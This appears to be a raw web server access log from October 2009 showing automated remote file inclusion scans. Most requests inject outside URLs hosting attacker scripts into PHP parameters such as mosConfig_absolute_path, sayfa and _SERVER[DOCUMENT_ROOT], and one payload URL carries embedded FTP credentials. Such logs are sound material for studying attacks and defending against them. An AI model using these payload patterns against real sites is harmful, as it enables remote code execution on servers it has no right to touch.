211.39.130.27 - - [13/Oct/2009:02:27:24 -0400] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://aniway.net/.../id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.39.130.27 - - [13/Oct/2009:02:27:27 -0400] "GET //skin/ggambo7002_board/comment_modify.php?dir=http://aniway.net/.../id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:02:27:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.39.130.27 - - [13/Oct/2009:02:27:34 -0400] "GET /logs/access_log.Q109072200//skin/ggambo7002_board/comment_modify.php?dir=http://aniway.net/.../id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:45 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:45 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:45 -0400] "GET /logs/access_log.Q109081900//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:45 -0400] "GET /logs/access_log.Q109081900//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:45 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:46 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:50 -0400] "GET /logs/access_log.Q109082000//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:50 -0400] "GET /logs/access_log.Q109082000//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:02:28:25 -0400] "GET ///skin/zero_vote/ask_password.php?%20dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:02:28:25 -0400] "GET /logs///skin/zero_vote/ask_password.php?%20dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.199.140.158 - - [13/Oct/2009:02:28:29 -0400] "GET /logs/access_log.Q109081900///skin/zero_vote/ask_password.php?%20dir=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:02:30:46 -0400] "GET /logs/index.php?pagina=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:02:30:46 -0400] "GET /index.php?pagina=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:02:30:46 -0400] "GET /logs/access_log.Q109072300%20%20/index.php?pagina=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:31:21 -0400] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:31:22 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:31:22 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:31:27 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:31:27 -0400] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:31:27 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:31:48 -0400] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:31:48 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:31:49 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:02:31:55 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
174.143.3.188 - - [13/Oct/2009:02:31:55 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
174.143.3.188 - - [13/Oct/2009:02:31:55 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
174.143.3.188 - - [13/Oct/2009:02:31:55 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
72.29.70.51 - - [13/Oct/2009:02:32:02 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:32:02 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:32:03 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:32:04 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:32:04 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:32:04 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:32:17 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:32:18 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:32:18 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:32:18 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:32:20 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:32:20 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:02:32:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.65.65.67 - - [13/Oct/2009:02:32:38 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:32:38 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.199.232.195 - - [13/Oct/2009:02:32:40 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
72.29.70.51 - - [13/Oct/2009:02:32:42 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:32:42 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:32:42 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:32:43 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
168.143.19.89 - - [13/Oct/2009:02:32:55 -0400] "GET /logs/access_log.Q109080200%20//components/com_simpleboard/image_upload.php?sbp=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 270 "-" "libwww-perl/5.825"
200.35.150.139 - - [13/Oct/2009:02:33:33 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:02:33:34 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:02:33:35 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:02:33:35 -0400] "GET /logs/access_log.Q109081300//admin/classes/TplLoad.php?full_path_to_public_program=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:33:35 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:33:36 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:33:36 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
206.108.7.161 - - [13/Oct/2009:02:33:38 -0400] "GET /logs/access_log.Q109080200%20//components/com_simpleboard/image_upload.php?sbp=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
72.3.133.37 - - [13/Oct/2009:02:33:57 -0400] "GET //login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:34:02 -0400] "GET /logs//login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:34:02 -0400] "GET /logs/access_log.Q109061300//login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.143.46.189 - - [13/Oct/2009:02:34:41 -0400] "GET /logs/access_log.Q109051700//zero_vote/ask_password.php?dir=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
221.143.46.189 - - [13/Oct/2009:02:34:41 -0400] "GET //zero_vote/ask_password.php?dir=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
221.143.46.189 - - [13/Oct/2009:02:34:41 -0400] "GET /logs//zero_vote/ask_password.php?dir=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
221.143.46.189 - - [13/Oct/2009:02:35:09 -0400] "GET /logs/access_log.Q109062400//zero_vote/ask_password.php?dir=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
77.242.37.212 - - [13/Oct/2009:02:35:58 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:02:35:59 -0400] "GET /logs/access_log.Q109060800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:02:35:58 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 200 21659 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:35:59 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:35:59 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:35:59 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:02:36:18 -0400] "GET /logs/access_log.Q109072300/index.php?pagina=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:36:29 -0400] "GET //login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:36:30 -0400] "GET /logs//login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:36:30 -0400] "GET /logs/access_log.Q109061300//login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:36:32 -0400] "GET //login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:36:35 -0400] "GET /logs/access_log.Q109061300//login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:36:35 -0400] "GET /logs//login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:02:36:42 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:02:36:42 -0400] "GET /logs/access_log.Q109081300%20%20//admin/classes/TplLoad.php?full_path_to_public_program=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.3.133.37 - - [13/Oct/2009:02:37:01 -0400] "GET /logs/access_log.Q109061300%20%20//login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.29.70.51 - - [13/Oct/2009:02:37:02 -0400] "GET /logs/access_log.Q109061300%20%20//login.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:37:05 -0400] "GET /logs//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:37:05 -0400] "GET //main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:02:37:05 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:02:37:12 -0400] "GET /logs/access_log.Q109082800//?_SERVERDOCUMENT_ROOT=http://banlat.ac.th/22.jpg????? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
125.251.147.194 - - [13/Oct/2009:02:37:12 -0400] "GET //?_SERVERDOCUMENT_ROOT=http://banlat.ac.th/22.jpg????? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
125.251.147.194 - - [13/Oct/2009:02:37:12 -0400] "GET /logs/access_log.Q109082900//?_SERVERDOCUMENT_ROOT=http://banlat.ac.th/22.jpg????? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
125.251.147.194 - - [13/Oct/2009:02:37:12 -0400] "GET /logs//?_SERVERDOCUMENT_ROOT=http://banlat.ac.th/22.jpg????? HTTP/1.1" 200 21657 "-" "libwww-perl/5.805"
209.59.12.99 - - [13/Oct/2009:02:37:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.242.37.212 - - [13/Oct/2009:02:37:50 -0400] "GET /logs/error_log.Q109060800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:37:53 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:37:54 -0400] "GET /logs/access_log.Q109071300%20%20//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:37:54 -0400] "GET /logs/error_log.Q109071300%20%20//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:37:54 -0400] "GET /logs/access_log.Q109071300%20%20//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:37:54 -0400] "GET /logs/error_log.Q109071300%20%20//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:37:54 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:37:53 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:37:54 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
61.199.232.195 - - [13/Oct/2009:02:38:04 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
61.199.232.195 - - [13/Oct/2009:02:38:04 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
61.199.232.195 - - [13/Oct/2009:02:38:04 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
61.199.232.195 - - [13/Oct/2009:02:38:09 -0400] "GET /logs/error_log.Q109100300/index.php?redir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
61.199.232.195 - - [13/Oct/2009:02:38:09 -0400] "GET /index.php?redir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
61.199.232.195 - - [13/Oct/2009:02:38:10 -0400] "GET /logs/index.php?redir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
121.124.127.164 - - [13/Oct/2009:02:38:14 -0400] "GET /logs/error_log.Q109071300//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:14 -0400] "GET /logs/access_log.Q109071300//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:14 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:14 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:14 -0400] "GET /logs/access_log.Q109071300//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:14 -0400] "GET /logs/error_log.Q109071300//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:14 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:14 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:26 -0400] "GET /?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:26 -0400] "GET /logs/access_log.Q109090900%20%20/?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:26 -0400] "GET /logs/error_log.Q109071800%20%20/?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:26 -0400] "GET /logs/?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
72.30.78.234 - - [13/Oct/2009:02:33:42 -0400] "GET /logs/error_log.Q109070300 HTTP/1.0" 200 2949061 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.124.127.164 - - [13/Oct/2009:02:38:48 -0400] "GET /logs/error_log.Q109071800%20%20/?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:48 -0400] "GET /logs/access_log.Q109090900%20%20/?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:48 -0400] "GET /?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:38:48 -0400] "GET /logs/?_server[document_root]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:39:44 -0400] "GET /logs/error_log.Q109071300//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:39:44 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:39:45 -0400] "GET /logs/access_log.Q109071300//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:39:45 -0400] "GET /logs/access_log.Q109071300//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:39:45 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:39:45 -0400] "GET /logs/error_log.Q109071300//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:39:45 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:02:39:45 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
